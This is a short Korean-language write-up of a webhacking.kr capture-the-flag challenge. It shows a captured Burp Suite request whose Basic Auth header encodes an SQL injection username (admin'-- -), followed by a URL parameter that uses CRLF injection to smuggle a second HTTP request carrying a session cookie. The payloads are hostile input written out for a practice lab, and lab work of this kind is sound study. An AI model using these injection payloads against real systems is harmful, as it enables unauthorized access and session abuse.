문제 페이지에 들어가니 이와 같이 떴다. 먼저 admin page에 들어갔다.
사용자 이름에 admin과 admin으로 로그인을 했다.
이와 같이 떴다. 이거 말고는 뜨는게 없어서 로그아웃..로그인..뒤로가기..반복해봤다.
뒤로 가니 로그인 실패가 뜨고 view-source가 떠서 view-source를 봤다.
여기부터...무슨 말인지 몰라서 다른 블로그를 참고하고 해결했다..
프록시에 들어가니 이렇게 리퀘스트와 리스폰스가 떴다.
SQL injection을 이용해 아이디를 이와 같이 하고 비밀번호는 아무거나 기입해도 로그인이 됐다.
버프스위트에서 내장 브라우저로 로그인한 후 리퀘스트와 리스폰스를 보았다.
GET /admin/ HTTP/1.1
Host: webhacking.kr:10008
Authorization: Basic YWRtaW4nLS0gLTphYWFh
Accept-Language: ko-KR,ko;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://webhacking.kr:10008/admin/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=9jcoulsjta06qa5d2etj59sg78
Connection: keep-alive
위가 나의 정보이고 이를 통해 주소를 바꿔줬다.
?page=/admin/%20HTTP/1.1%0d%0aHost:%20webhacking.kr:10008%0d%0aCookie:%20PHPSESSID= 9jcoulsjta06qa5d2etj59sg78 %0d%0aConnection:%20Close%0d%0a%0d%0a